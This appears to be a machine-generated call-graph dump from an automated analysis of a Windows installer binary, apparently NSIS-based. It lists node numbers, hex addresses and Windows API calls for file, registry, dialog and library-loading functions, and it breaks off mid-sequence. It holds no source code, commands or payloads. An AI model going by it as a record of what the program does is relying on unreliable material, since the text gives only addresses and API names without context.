5342->5343 5344 402b53 5343->5344 5345 402b57 IIDFromString 5344->5345 5347 402b8e 5344->5347 5346 402b66 5345->5346 5345->5347 5346->5347 5350 4063db lstrcpynW 5346->5350 5349 402b83 CoTaskMemFree 5349->5347 5350->5349 5351 6ca72ca3 5352 6ca72cbb 5351->5352 5353 6ca7158f 2 API calls 5352->5353 5354 6ca72cd6 5353->5354 5362 402947 5363 402d3e 17 API calls 5362->5363 5364 402955 5363->5364 5365 40296b 5364->5365 5366 402d3e 17 API calls 5364->5366 5367 405eac 2 API calls 5365->5367 5366->5365 5368 402971 5367->5368 5390 405ed1 GetFileAttributesW CreateFileW 5368->5390 5370 40297e 5371 402a21 5370->5371 5372 40298a GlobalAlloc 5370->5372 5373 402a29 DeleteFileW 5371->5373 5374 402a3c 5371->5374 5375 4029a3 5372->5375 5376 402a18 CloseHandle 5372->5376 5373->5374 5391 403447 SetFilePointer 5375->5391 5376->5371 5378 4029a9 5379 403431 ReadFile 5378->5379 5380 4029b2 GlobalAlloc 5379->5380 5381 4029c2 5380->5381 5382 4029f6 5380->5382 5383 40324c 35 API calls 5381->5383 5384 405f83 WriteFile 5382->5384 5389 4029cf 5383->5389 5385 402a02 GlobalFree 5384->5385 5386 40324c 35 API calls 5385->5386 5388 402a15 5386->5388 5387 4029ed GlobalFree 5387->5382 5388->5376 5389->5387 5390->5370 5391->5378 5395 4016cc 5396 402d3e 17 API calls 5395->5396 5397 4016d2 GetFullPathNameW 5396->5397 5398 40170e 5397->5398 5399 4016ec 5397->5399 5400 402bc2 5398->5400 5401 401723 GetShortPathNameW 5398->5401 5399->5398 5402 406739 2 API calls 5399->5402 5401->5400 5403 4016fe 5402->5403 5403->5398 5405 4063db lstrcpynW 5403->5405 5405->5398 5406 401e4e GetDC 5407 402d1c 17 API calls 5406->5407 5408 401e60 GetDeviceCaps MulDiv ReleaseDC 5407->5408 5409 402d1c 17 API calls 5408->5409 5410 401e91 5409->5410 5411 406418 17 API calls 5410->5411 5412 401ece CreateFontIndirectW 5411->5412 5413 402630 5412->5413 5414 402acf 5415 402d1c 17 API calls 5414->5415 5416 402ad5 5415->5416 5417 402b12 5416->5417 5418 402925 5416->5418 5420 402ae7 5416->5420 5417->5418 5419 406418 17 API calls 5417->5419 5419->5418 5420->5418 5422 406322 wsprintfW 5420->5422 5422->5418 4968 4020d0 4969 4020e2 4968->4969 4970 402194 4968->4970 4971 402d3e 17 API calls 4969->4971 4972 401423 24 API calls 4970->4972 4973 4020e9 4971->4973 4979 4022ee 4972->4979 4974 402d3e 17 API calls 4973->4974 4975 4020f2 4974->4975 4976 402108 LoadLibraryExW 4975->4976 4977 4020fa GetModuleHandleW 4975->4977 4976->4970 4978 402119 4976->4978 4977->4976 4977->4978 4991 40683f 4978->4991 4982 402163 4986 405443 24 API calls 4982->4986 4983 40212a 4984 402132 4983->4984 4985 402149 4983->4985 4987 401423 24 API calls 4984->4987 4996 6ca71777 4985->4996 4988 40213a 4986->4988 4987->4988 4988->4979 4989 402186 FreeLibrary 4988->4989 4989->4979 5038 4063fd WideCharToMultiByte 4991->5038 4993 40685c 4994 406863 GetProcAddress 4993->4994 4995 402124 4993->4995 4994->4995 4995->4982 4995->4983 4997 6ca717aa 4996->4997 5039 6ca71b5f 4997->5039 4999 6ca717b1 5000 6ca718d6 4999->5000 5001 6ca717c2 4999->5001 5002 6ca717c9 4999->5002 5000->4988 5089 6ca7239e 5001->5089 5073 6ca723e0 5002->5073 5007 6ca7180f 5102 6ca725b5 5007->5102 5008 6ca7182d 5011 6ca71833 5008->5011 5012 6ca7187e 5008->5012 5009 6ca717df 5014 6ca717e5 5009->5014 5019 6ca717f0 5009->5019 5010 6ca717f8 5023 6ca717ee 5010->5023 5099 6ca72d83 5010->5099 5121 6ca715c6 5011->5121 5017 6ca725b5 10 API calls 5012->5017 5014->5023 5083 6ca72af8 5014->5083 5024 6ca7186f 5017->5024 5018 6ca71815 5113 6ca715b4 5018->5113 5093 6ca72770 5019->5093 5023->5007 5023->5008 5029 6ca718c5 5024->5029 5127 6ca72578 5024->5127 5026 6ca717f6 5026->5023 5027 6ca725b5 10 API calls 5027->5024 5029->5000 5031 6ca718cf GlobalFree 5029->5031 5031->5000 5035 6ca718b1 5035->5029 5131 6ca7153d wsprintfW 5035->5131 5037 6ca718aa FreeLibrary 5037->5035 5038->4993 5134 6ca7121b GlobalAlloc 5039->5134 5041 6ca71b86 5135 6ca7121b GlobalAlloc 5041->5135 5043 6ca71dcb GlobalFree GlobalFree GlobalFree 5044 6ca71de8 5043->5044 5057 6ca71e32 5043->5057 5046 6ca721de 5044->5046 5047 6ca71dfd 5044->5047 5044->5057 5045 6ca71b91 5045->5043 5048 6ca71c86 GlobalAlloc 5045->5048 5049 6ca7210e 5045->5049 5051 6ca71cd1 lstrcpyW 5045->5051 5052 6ca71cef GlobalFree 5045->5052 5056 6ca71cdb lstrcpyW 5045->5056 5045->5057 5058 6ca72086 5045->5058 5064 6ca71fc7 GlobalFree 5045->5064 5066 6ca7122c 2 API calls 5045->5066 5067 6ca71d2d 5045->5067 5050 6ca72200 GetModuleHandleW 5046->5050 5046->5057 5047->5057 5138 6ca7122c 5047->5138 5048->5045 5049->5057 5070 6ca72176 lstrcpyW 5049->5070 5053 6ca72226 5050->5053 5054 6ca72211 LoadLibraryW 5050->5054 5051->5056 5052->5045 5142 6ca7161d WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 5053->5142 5054->5053 5054->5057 5056->5045 5057->4999 5141 6ca7121b GlobalAlloc 5058->5141 5060 6ca72285 lstrlenW 5143 6ca7161d WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 5060->5143 5061 6ca72278 5061->5057 5061->5060 5064->5045 5065 6ca7229f 5065->5057 5066->5045 5067->5045 5136 6ca7158f GlobalSize GlobalAlloc 5067->5136 5068 6ca72238 5068->5061 5071 6ca72262 GetProcAddress 5068->5071 5070->5057 5071->5061 5072 6ca7208f 5072->4999 5075 6ca723f8 5073->5075 5074 6ca7122c GlobalAlloc lstrcpynW 5074->5075 5075->5074 5077 6ca72521 GlobalFree 5075->5077 5078 6ca724a0 GlobalAlloc WideCharToMultiByte 5075->5078 5079 6ca724cb GlobalAlloc CLSIDFromString 5075->5079 5082 6ca724ea 5075->5082 5145 6ca712ba 5075->5145 5077->5075 5080 6ca717cf 5077->5080 5078->5077 5079->5077 5080->5009 5080->5010 5080->5023 5082->5077 5149 6ca72704 5082->5149 5085 6ca72b0a 5083->5085 5084 6ca72baf CreateFileA 5088 6ca72bcd 5084->5088 5085->5084 5087 6ca72c99 5087->5023 5152 6ca72aa2 5088->5152 5090 6ca723b3 5089->5090 5091 6ca723be GlobalAlloc 5090->5091 5092 6ca717c8 5090->5092 5091->5090 5092->5002 5097 6ca727a0 5093->5097 5094 6ca7284e 5096 6ca72854 GlobalSize 5094->5096 5098 6ca7285e 5094->5098 5095 6ca7283b GlobalAlloc 5095->5098 5096->5098 5097->5094 5097->5095 5098->5026 5100 6ca72d8e 5099->5100 5101 6ca72dce GlobalFree 5100->5101 5156 6ca7121b GlobalAlloc 5102->5156 5104 6ca725bf 5105 6ca7266b lstrcpynW 5104->5105 5106 6ca7265a StringFromGUID2 5104->5106 5107 6ca72638 MultiByteToWideChar 5104->5107 5108 6ca726a2 GlobalFree 5104->5108 5109 6ca7267e wsprintfW 5104->5109 5110 6ca726d7 GlobalFree 5104->5110 5111 6ca71272 2 API calls 5104->5111 5157 6ca712e1 5104->5157 5105->5104 5106->5104 5107->5104 5108->5104 5109->5104 5110->5018 5111->5104 5161 6ca7121b GlobalAlloc 5113->5161 5115 6ca715b9 5116 6ca715c6 2 API calls 5115->5116 5117 6ca715c3 5116->5117 5118 6ca71272 5117->5118 5119 6ca712b5 GlobalFree 5118->5119 5120 6ca7127b GlobalAlloc lstrcpynW 5118->5120 5119->5024 5120->5119 5122 6ca715d2 wsprintfW 5121->5122 5125 6ca715ff lstrcpyW 5121->5125 5126 6ca71618 5122->5126 5125->5126 5126->5027 5128 6ca72586 5127->5128 5129 6ca71891 5127->5129 5128->5129 5130 6ca725a2 GlobalFree 5128->5130 5129->5035 5129->5037 5130->5128 5132 6ca71272 2 API calls 5131->5132 5133 6ca7155e 5132->5133 5133->5029 5134->5041 5135->5045 5137 6ca715ad 5136->5137 5137->5067 5144 6ca7121b GlobalAlloc 5138->5144 5140 6ca7123b lstrcpynW 5140->5057 5141->5072 5142->5068 5143->5065 5144->5140 5146 6ca712c1 5145->5146 5147 6ca7122c 2 API calls 5146->5147 5148 6ca712df 5147->5148 5148->5075 5150 6ca72712 VirtualAlloc 5149->5150 5151 6ca72768 5149->5151 5150->5151 5151->5082 5153 6ca72aad 5152->5153 5154 6ca72ab2 GetLastError 5153->5154 5155 6ca72abd 5153->5155 5154->5155 5155->5087 5156->5104 5158 6ca7130c 5157->5158 5159 6ca712ea 5157->5159 5158->5104 5159->5158 5160 6ca712f0 lstrcpyW 5159->5160 5160->5158 5161->5115 5423 4028d5 5424 4028dd 5423->5424 5425 4028e1 FindNextFileW 5424->5425 5428 4028f3 5424->5428 5426 40293a 5425->5426 5425->5428 5429 4063db lstrcpynW 5426->5429 5429->5428 5430 401956 5431 402d3e 17 API calls 5430->5431 5432 40195d lstrlenW 5431->5432 5433 402630 5432->5433 5183 4014d7 5184 402d1c 17 API calls 5183->5184 5185 4014dd Sleep 5184->5185 5187 402bc2 5185->5187 5188 403e58 5189 403e70 5188->5189 5190 403fab 5188->5190 5189->5190 5193 403e7c 5189->5193 5191 403ffc 5190->5191 5192 403fbc GetDlgItem GetDlgItem 5190->5192 5195 404056 5191->5195 5205 401389 2 API calls 5191->5205 5194 404331 18 API calls 5192->5194 5196 403e87 SetWindowPos 5193->5196 5197 403e9a 5193->5197 5200 403fe6 SetClassLongW 5194->5200 5201 40437d SendMessageW 5195->5201 5206 403fa6 5195->5206 5196->5197 5198 403eb7 5197->5198 5199 403e9f ShowWindow 5197->5199 5202 403ed9 5198->5202 5203 403ebf DestroyWindow 5198->5203 5199->5198 5204 40140b 2 API calls 5200->5204 5228 404068 5201->5228 5208 403ede SetWindowLongW 5202->5208 5209 403eef 5202->5209 5207 4042ba 5203->5207 5204->5191 5210 40402e 5205->5210 5207->5206 5216 4042eb ShowWindow 5207->5216 5208->5206 5213 403f98 5209->5213 5214 403efb GetDlgItem 5209->5214 5210->5195 5215 404032 SendMessageW 5210->5215 5211 40140b 2 API calls 5211->5228 5212 4042bc DestroyWindow EndDialog 5212->5207 5219 404398 8 API calls 5213->5219 5217 403f2b 5214->5217 5218 403f0e SendMessageW IsWindowEnabled 5214->5218 5215->5206 5216->5206 5221 403f38 5217->5221 5223 403f7f SendMessageW 5217->5223 5224 403f4b 5217->5224 5232 403f30 5217->5232 5218->5206 5218->5217 5219->5206 5220 406418 17 API calls 5220->5228 5221->5223 5221->5232 5222 40430a SendMessageW 5227 403f66 5222->5227 5223->5213 5225 403f53 5224->5225 5226 403f68 5224->5226 5229 40140b 2 API calls 5225->5229 5230 40140b 2 API calls 5226->5230 5227->5213 5228->5206 5228->5211 5228->5212 5228->5220 5231 404331 18 API calls 5228->5231 5234 404331 18 API calls 5228->5234 5250 4041fc DestroyWindow 5228->5250 5229->5232 5233 403f6f 5230->5233 5231->5228 5232->5222 5233->5213 5233->5232 5235 4040e3 GetDlgItem 5234->5235 5236 404100 ShowWindow KiUserCallbackDispatcher 5235->5236 5237 4040f8 5235->5237 5259 404353 KiUserCallbackDispatcher 5236->5259 5237->5236 5239 40412a EnableWindow 5244 40413e 5239->5244 5240 404143 GetSystemMenu EnableMenuItem SendMessageW 5241 404173 SendMessageW 5240->5241 5240->5244 5241->5244 5243 403e39 18 API calls 5243->5244 5244->5240 5244->5243 5260 404366 SendMessageW 5244->5260 5261 4063db lstrcpynW 5244->5261 5246 4041a2 lstrlenW 5247 406418 17 API calls 5246->5247 5248 4041b8 SetWindowTextW 5247->5248 5249 401389 2 API calls 5248->5249 5249->5228 5250->5207 5251 404216 CreateDialogParamW 5250->5251 5251->5207 5252 404249 5251->5252 5253 404331 18 API calls 5252->5253 5254 404254 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 5253->5254 5255 401389 2 API calls 5254->5255 5256 40429a 5255->5256 5256->5206 5257 4042a2 ShowWindow 5256->5257 5258 40437d SendMessageW 5257->5258 5258->5207 5259->5239 5260->5244 5261->5246 5434 6ca7103d 5437 6ca7101b 5434->5437 5444 6ca71516 5437->5444 5439 6ca71020 5440 6ca71027 GlobalAlloc 5439->5440 5441 6ca71024 5439->5441 5440->5441 5442 6ca7153d 3 API calls 5441->5442 5443 6ca7103b 5442->5443 5446 6ca7151c 5444->5446 5445 6ca71522 5445->5439 5446->5445 5447 6ca7152e GlobalFree 5446->5447 5447->5439 5448 4047db 5449 404811 5448->5449 5450 4047eb 5448->5450 5452 404398 8 API calls 5449->5452 5451 404331 18 API calls 5450->5451 5453 4047f8 SetDlgItemTextW 5451->5453 5454 40481d 5452->5454 5453->5449 5288 40175c 5289 402d3e 17 API calls 5288->5289 5290 401763 5289->5290 5291 405f00 2 API calls 5290->5291 5292 40176a 5291->5292 5293 405f00 2 API calls 5292->5293 5293->5292 5455 401d5d 5456 402d1c 17 API calls 5455->5456 5457 401d6e SetWindowLongW 5456->5457 5458 402bc2 5457->5458 5294 401ede 5295 402d1c 17 API calls 5294->5295 5296 401ee4 5295->5296 5297 402d1c 17 API calls 5296->5297 5298 401ef0 5297->5298 5299 401f07 EnableWindow 5298->5299 5300 401efc ShowWindow 5298->5300 5301 402bc2 5299->5301 5300->5301 5466 401563 5467 402b08 5466->5467 5470 406322 wsprintfW 5467->5470 5469 402b0d 5470->5469 4576 4026e4 4577 402d1c 17 API calls 4576->4577 4579 4026f3 4577->4579 4578 402830 4579->4578 4580 40273d ReadFile 4579->4580 4581 405f54 ReadFile 4579->4581 4582 4027d6 4579->4582 4583 402832 4579->4583 4584 40277d MultiByteToWideChar 4579->4584 4587 4027a3 SetFilePointer MultiByteToWideChar 4579->4587 4588 402843 4579->4588 4580->4578 4580->4579 4581->4579 4582->4578 4582->4579 4590 405fb2 SetFilePointer 4582->4590 4599 406322 wsprintfW 4583->4599 4584->4579 4587->4579 4588->4578 4589 402864 SetFilePointer 4588->4589 4589->4578 4591 405fe6 4590->4591 4592 405fce 4590->4592 4591->4582 4593 405f54 ReadFile 4592->4593 4594 405fda 4593->4594 4594->4591 4595 406017 SetFilePointer 4594->4595 4596 405fef SetFilePointer 4594->4596 4595->4591 4596->4595 4597 405ffa 4596->4597 4598 405f83 WriteFile 4597->4598 4598->4591 4599->4578 5471 404467 lstrcpynW lstrlenW 5472 6ca71000 5473 6ca7101b 5 API calls 5472->5473 5474 6ca71019 5473->5474 5475 403a68 5476 403a73 5475->5476 5477 403a77 5476->5477 5478 403a7a GlobalAlloc 5476->5478 5478->5477 5479 401968 5480 402d1c 17 API calls 5479->5480 5481 40196f 5480->5481 5482 402d1c 17 API calls 5481->5482 5483 40197c 5482->5483 5484 402d3e 17 API calls 5483->5484 5485 401993 lstrlenW 5484->5485 5486 4019a4 5485->5486 5487 4019e5 5486->5487 5491 4063db lstrcpynW 5486->5491 5489 4019d5 5489->5487 5490 4019da lstrlenW 5489->5490 5490->5487 5491->5489 5492 40166a 5493 402d3e 17 API calls 5492->5493 5494 401670 5493->5494 5495 406739 2 API calls 5494->5495 5496 401676 5495->5496 5497 4023ec 5498 402d3e 17 API calls 5497->5498 5499 4023fb 5498->5499 5500 402d3e 17 API calls 5499->5500 5501 402404 5500->5501 5502 402d3e 17 API calls 5501->5502 5503 40240e GetPrivateProfileStringW 5502->5503 4683 40176f 4684 402d3e 17 API calls 4683->4684 4685 401776 4684->4685 4686 401796 4685->4686 4687 40179e 4685->4687 4723 4063db lstrcpynW 4686->4723 4724 4063db lstrcpynW 4687->4724 4690 40179c 4694 40668a 5 API calls 4690->4694 4691 4017a9 4692 405cb0 3 API calls 4691->4692 4693 4017af lstrcatW 4692->4693 4693->4690 4707 4017bb 4694->4707 4695 406739 2 API calls 4695->4707 4696 4017f7 4697 405eac 2 API calls 4696->4697 4697->4707 4699 4017cd CompareFileTime 4699->4707 4700 40188d 4701 405443 24 API calls 4700->4701 4703 401897 4701->4703 4702 4063db lstrcpynW 4702->4707 4705 40324c 35 API calls 4703->4705 4704 405443 24 API calls 4712 401879 4704->4712 4706 4018aa 4705->4706 4708 4018be SetFileTime 4706->4708 4710 4018d0 FindCloseChangeNotification 4706->4710 4707->4695 4707->4696 4707->4699 4707->4700 4707->4702 4709 406418 17 API calls 4707->4709 4721 401864 4707->4721 4722 405ed1 GetFileAttributesW CreateFileW 4707->4722 4725 405a41 4707->4725 4708->4710 4709->4707 4711 4018e1 4710->4711 4710->4712 4713 4018e6 4711->4713 4714 4018f9 4711->4714 4716 406418 17 API calls 4713->4716 4715 406418 17 API calls 4714->4715 4717 401901 4715->4717 4719 4018ee lstrcatW 4716->4719 4717->4712 4720 405a41 MessageBoxIndirectW 4717->4720 4719->4717 4720->4712 4721->4704 4721->4712 4722->4707 4723->4690 4724->4691 4726 405a56 4725->4726 4727 405aa2 4726->4727 4728 405a6a MessageBoxIndirectW 4726->4728 4727->4707 4728->4727 5511 4044f0 5512 404622 5511->5512 5514 404508 5511->5514 5513 40468c 5512->5513 5515 404756 5512->5515 5520 40465d GetDlgItem SendMessageW 5512->5520 5513->5515 5516 404696 GetDlgItem 5513->5516 5517 404331 18 API calls 5514->5517 5522 404398 8 API calls 5515->5522 5518 4046b0 5516->5518 5519 404717 5516->5519 5521 40456f 5517->5521 5518->5519 5527 4046d6 SendMessageW LoadCursorW SetCursor 5518->5527 5519->5515 5523 404729 5519->5523 5544 404353 KiUserCallbackDispatcher 5520->5544 5525 404331 18 API calls 5521->5525 5526 404751 5522->5526 5528 40473f 5523->5528 5529 40472f SendMessageW 5523->5529 5531 40457c CheckDlgButton 5525->5531 5548 40479f 5527->5548 5528->5526 5533 404745 SendMessageW 5528->5533 5529->5528 5530 404687 5545 40477b 5530->5545 5542 404353 KiUserCallbackDispatcher 5531->5542 5533->5526 5537 40459a GetDlgItem 5543 404366 SendMessageW 5537->5543 5539 4045b0 SendMessageW 5540 4045d6 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 5539->5540 5541 4045cd GetSysColor 5539->5541 5540->5526 5541->5540 5542->5537 5543->5539 5544->5530 5546 404789 5545->5546 5547 40478e SendMessageW 5545->5547 5546->5547 5547->5513 5551 405a07 ShellExecuteExW 5548->5551 5550 404705 LoadCursorW SetCursor 5550->5519 5551->5550 5552 401a72 5553 402d1c 17 API calls 5552->5553 5554 401a7b 5553->5554 5555 402d1c 17 API calls 5554->5555 5556 401a20 5555->5556 5162 401573 5163 401583 ShowWindow 5162->5163 5164 40158c 5162->5164 5163->5164 5165 402bc2 5164->5165 5166 40159a ShowWindow 5164->5166 5166->5165 5557 4014f5 SetForegroundWindow 5558 402bc2 5557->5558 5559 401ff6 5560 402d3e 17 API calls 5559->5560 5561 401ffd 5560->5561 5562 406739 2 API calls 5561->5562 5563 402003 5562->5563 5565 402014 5563->5565 5566 406322 wsprintfW 5563->5566 5566->5565 5567 401b77 5568 402d3e 17 API calls 5567->5568 5569 401b7e 5568->5569 5570 402d1c 17 API calls 5569->5570 5571 401b87 wsprintfW 5570->5571 5572 402bc2 5571->5572 5573 4022f7 5574 402d3e 17 API calls 5573->5574 5575 4022fd 5574->5575 5576 402d3e 17 API calls 5575->5576 5577 402306 5576->5577 5578 402d3e 17 API calls 5577->5578 5579 40230f 5578->5579 5580 406739 2 API calls 5579->5580 5581 402318 5580->5581 5582 402329 lstrlenW lstrlenW 5581->5582 5583 40231c 5581->5583 5585 405443 24 API calls 5582->5585 5584 405443 24 API calls 5583->5584 5587 402324 5583->5587 5584->5587 5586 402367 SHFileOperationW 5585->5586 5586->5583 5586->5587 5588 404b78 5589 404ba4 5588->5589 5590 404b88 5588->5590 5591 404bd7 5589->5591 5592 404baa SHGetPathFromIDListW 5589->5592 5599 405a25 GetDlgItemTextW 5590->5599 5595 404bba 5592->5595 5598 404bc1 SendMessageW 5592->5598 5594 404b95 SendMessageW 5594->5589 5596 40140b 2 API calls 5595->5596 5596->5598 5598->5591 5599->5594 5600 406afa 5604 40697e 5600->5604 5601 4072e9 5602 406a08 GlobalAlloc 5602->5601 5602->5604 5603 4069ff GlobalFree 5603->5602 5604->5601 5604->5602 5604->5603 5605 406a76 GlobalFree 5604->5605 5606 406a7f GlobalAlloc 5604->5606 5605->5606 5606->5601 5606->5604 5607 40167b 5608 402d3e 17 API calls 5607->5608 5609 401682 5608->5609 5610 402d3e 17 API calls 5609->5610 5611 40168b 5610->5611 5612 402d3e 17 API calls 5611->5612 5613 401694 MoveFileW 5612->5613 5614 4016a0 5613->5614 5615 4016a7 5613->5615 5617 401423 24 API calls 5614->5617 5616 406739 2 API calls 5615->5616 5619 4022ee 5615->5619 5618 4016b6 5616->5618 5617->5619 5618->5619 5620 4061a1 36 API calls 5618->5620 5620->5614 5621 40237b 5622 402382 5621->5622 5625 402395 5621->5625 5623 406418 17 API calls 5622->5623 5624 40238f 5623->5624 5624->5625 5626 405a41 MessageBoxIndirectW 5624->5626 5626->5625 5627 4019ff 5628 402d3e 17 API calls 5627->5628 5629 401a06 5628->5629 5630 402d3e 17 API calls 5629->5630 5631 401a0f 5630->5631 5632 401a16 lstrcmpiW 5631->5632 5633 401a28 lstrcmpW 5631->5633 5634 401a1c 5632->5634 5633->5634 5635 401000 5636 401037 BeginPaint GetClientRect 5635->5636 5637 40100c DefWindowProcW 5635->5637 5638 4010f3 5636->5638 5640 401179 5637->5640 5641 401073 CreateBrushIndirect FillRect DeleteObject 5638->5641 5642 4010fc 5638->5642 5641->5638 5643 401102 CreateFontIndirectW 5642->5643 5644 401167 EndPaint 5642->5644 5643->5644 5645 401112 6 API calls 5643->5645 5644->5640 5645->5644 5646 401d81 5647 401d94 GetDlgItem 5646->5647 5648 401d87 5646->5648 5650 401d8e 5647->5650 5649 402d1c 17 API calls 5648->5649 5649->5650 5651 402d3e 17 API calls 5650->5651 5653 401dd5 GetClientRect LoadImageW SendMessageW 5650->5653 5651->5653 5654 401e33 5653->5654 5656 401e3f 5653->5656 5655 401e38 DeleteObject 5654->5655 5654->5656 5655->5656 4419 402902 4420 402d3e 17 API calls 4419->4420 4421 402909 FindFirstFileW 4420->4421 4422 402931 4421->4422 4423 40291c 4421->4423 4424 40293a 4422->4424 4427 406322 wsprintfW 4422->4427 4428 4063db lstrcpynW 4424->4428 4427->4424 4428->4423 4429 405582 4430 4055a3 GetDlgItem GetDlgItem GetDlgItem 4429->4430 4431 40572c 4429->4431 4475 404366 SendMessageW 4430->4475 4433 405735 GetDlgItem CreateThread FindCloseChangeNotification 4431->4433 4434 40575d 4431->4434 4433->4434 4498 405516 OleInitialize 4433->4498 4435 405788 4434->4435 4437 405774 ShowWindow ShowWindow 4434->4437 4438 4057ad 4434->4438 4439 405794 4435->4439 4440 4057e8 4435->4440 4436 405613 4441 40561a GetClientRect GetSystemMetrics SendMessageW SendMessageW 4436->4441 4480 404366 SendMessageW 4437->4480 4484 404398 4438->4484 4443 4057c2 ShowWindow 4439->4443 4444 40579c 4439->4444 4440->4438 4448 4057f6 SendMessageW 4440->4448 4446 405688 4441->4446 4447 40566c SendMessageW SendMessageW 4441->4447 4451 4057e2 4443->4451 4452 4057d4 4443->4452 4481 40430a 4444->4481 4453 40569b 4446->4453 4454 40568d SendMessageW 4446->4454 4447->4446 4450 4057bb 4448->4450 4455 40580f CreatePopupMenu 4448->4455 4457 40430a SendMessageW 4451->4457 4456 405443 24 API calls 4452->4456 4476 404331 4453->4476 4454->4453 4458 406418 17 API calls 4455->4458 4456->4451 4457->4440 4460 40581f AppendMenuW 4458->4460 4462 40583c GetWindowRect 4460->4462 4463 40584f TrackPopupMenu 4460->4463 4461 4056ab 4464 4056b4 ShowWindow 4461->4464 4465 4056e8 GetDlgItem SendMessageW 4461->4465 4462->4463 4463->4450 4466 40586a 4463->4466 4467 4056d7 4464->4467 4468 4056ca ShowWindow 4464->4468 4465->4450 4469 40570f SendMessageW SendMessageW 4465->4469 4470 405886 SendMessageW 4466->4470 4479 404366 SendMessageW 4467->4479 4468->4467 4469->4450 4470->4470 4471 4058a3 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4470->4471 4473 4058c8 SendMessageW 4471->4473 4473->4473 4474 4058f1 GlobalUnlock SetClipboardData CloseClipboard 4473->4474 4474->4450 4475->4436 4477 406418 17 API calls 4476->4477 4478 40433c SetDlgItemTextW 4477->4478 4478->4461 4479->4465 4480->4435 4482 404311 4481->4482 4483 404317 SendMessageW 4481->4483 4482->4483 4483->4438 4485 40445b 4484->4485 4486 4043b0 GetWindowLongW 4484->4486 4485->4450 4486->4485 4487 4043c5 4486->4487 4487->4485 4488 4043f2 GetSysColor 4487->4488 4489 4043f5 4487->4489 4488->4489 4490 404405 SetBkMode 4489->4490 4491 4043fb SetTextColor 4489->4491 4492 404423 4490->4492 4493 40441d GetSysColor 4490->4493 4491->4490 4494 404434 4492->4494 4495 40442a SetBkColor 4492->4495 4493->4492 4494->4485 4496 404447 DeleteObject 4494->4496 4497 40444e CreateBrushIndirect 4494->4497 4495->4494 4496->4497 4497->4485 4505 40437d 4498->4505 4500 405560 4501 40437d SendMessageW 4500->4501 4502 405572 OleUninitialize 4501->4502 4503 405539 4503->4500 4508 401389 4503->4508 4506 404395 4505->4506 4507 404386 SendMessageW 4505->4507 4506->4503 4507->4506 4510 401390 4508->4510 4509 4013fe 4509->4503 4510->4509 4511 4013cb MulDiv SendMessageW 4510->4511 4511->4510 4512 402482 4513 402d3e 17 API calls 4512->4513 4514 402494 4513->4514 4515 402d3e 17 API calls 4514->4515 4516 40249e 4515->4516 4529 402dce 4516->4529 4519 402bc2 4520 4024d6 4522 4024e2 4520->4522 4533 402d1c 4520->4533 4521 402d3e 17 API calls 4523 4024cc lstrlenW 4521->4523 4525 402501 RegSetValueExW 4522->4525 4536 40324c 4522->4536 4523->4520 4527 402517 RegCloseKey 4525->4527 4527->4519 4530 402de9 4529->4530 4557 406276 4530->4557 4534 406418 17 API calls 4533->4534 4535 402d31 4534->4535 4535->4522 4538 403265 4536->4538 4537 403290 4561 403431 4537->4561 4538->4537 4571 403447 SetFilePointer 4538->4571 4542 4033bb 4542->4525 4543 4033d1 4545 4033d5 4543->4545 4549 4033ed 4543->4549 4544 4032ad GetTickCount 4554 4032c0 4544->4554 4546 403431 ReadFile 4545->4546 4546->4542 4547 403431 ReadFile 4547->4549 4548 403431 ReadFile 4548->4554 4549->4542 4549->4547 4550 405f83 WriteFile 4549->4550 4550->4549 4552 403326 GetTickCount 4552->4554 4553 40334f MulDiv wsprintfW 4555 405443 24 API calls 4553->4555 4554->4542 4554->4548 4554->4552 4554->4553 4556 405f83 WriteFile 4554->4556 4564 40694b 4554->4564 4555->4554 4556->4554 4558 406285 4557->4558 4559 406290 RegCreateKeyExW 4558->4559 4560 4024ae 4558->4560 4559->4560 4560->4519 4560->4520 4560->4521 4562 405f54 ReadFile 4561->4562 4563 40329b 4562->4563 4563->4542 4563->4543 4563->4544 4565 406970 4564->4565 4566 406978 4564->4566 4565->4554 4566->4565 4567 406a08 GlobalAlloc 4566->4567 4568 4069ff GlobalFree 4566->4568 4569 406a76 GlobalFree 4566->4569 4570 406a7f GlobalAlloc 4566->4570 4567->4565 4567->4566 4568->4567 4569->4570 4570->4565 4570->4566 4571->4537 5664 401503 5665 40150b 5664->5665 5667 40151e 5664->5667 5666 402d1c 17 API calls 5665->5666 5666->5667 5668 6ca710e1 5671 6ca71111 5668->5671 5669 6ca711d8 GlobalFree 5670 6ca712ba 2 API calls 5670->5671 5671->5669 5671->5670 5672 6ca711d3 5671->5672 5673 6ca71272 2 API calls 5671->5673 5674 6ca71164 GlobalAlloc 5671->5674 5675 6ca711f8 GlobalFree 5671->5675 5676 6ca711c4 GlobalFree 5671->5676 5677 6ca712e1 lstrcpyW 5671->5677 5672->5669 5673->5676 5674->5671 5675->5671 5676->5671 5677->5671 4628 402889 4629 402890 4628->4629 4632 402b0d 4628->4632 4630 402d1c 17 API calls 4629->4630 4631 402897 4630->4631 4633 4028a6 SetFilePointer 4631->4633 4633->4632 4634 4028b6 4633->4634 4636 406322 wsprintfW 4634->4636 4636->4632 5678 6ca7166d 5679 6ca71516 GlobalFree 5678->5679 5682 6ca71685 5679->5682 5680 6ca716cb GlobalFree 5681 6ca716a0 5681->5680 5682->5680 5682->5681 5683 6ca716b7 VirtualFree 5682->5683 5683->5680 5684 40190c 5685 401943 5684->5685 5686 402d3e 17 API calls 5685->5686 5687 401948 5686->5687 5688 405aed 67 API calls 5687->5688 5689 401951 5688->5689 4729 40348f SetErrorMode GetVersion 4730 4034ce 4729->4730 4731 4034d4 4729->4731 4732 4067d0 5 API calls 4730->4732 4733 406760 3 API calls 4731->4733 4732->4731 4734 4034ea lstrlenA 4733->4734 4734->4731 4735 4034fa 4734->4735 4736 4067d0 5 API calls 4735->4736 4737 403501 4736->4737 4738 4067d0 5 API calls 4737->4738 4739 403508 4738->4739 4740 4067d0 5 API calls 4739->4740 4741 403514 #17 OleInitialize SHGetFileInfoW 4740->4741 4819 4063db lstrcpynW 4741->4819 4744 403560 GetCommandLineW 4820 4063db lstrcpynW 4744->4820 4746 403572 4747 405cdd CharNextW 4746->4747 4748 403597 CharNextW 4747->4748 4749 4036c1 GetTempPathW 4748->4749 4750 4035b0 4748->4750 4821 40345e 4749->4821 4750->4750 4755 405cdd CharNextW 4750->4755 4763 4036ac 4750->4763 4764 4036aa 4750->4764 4752 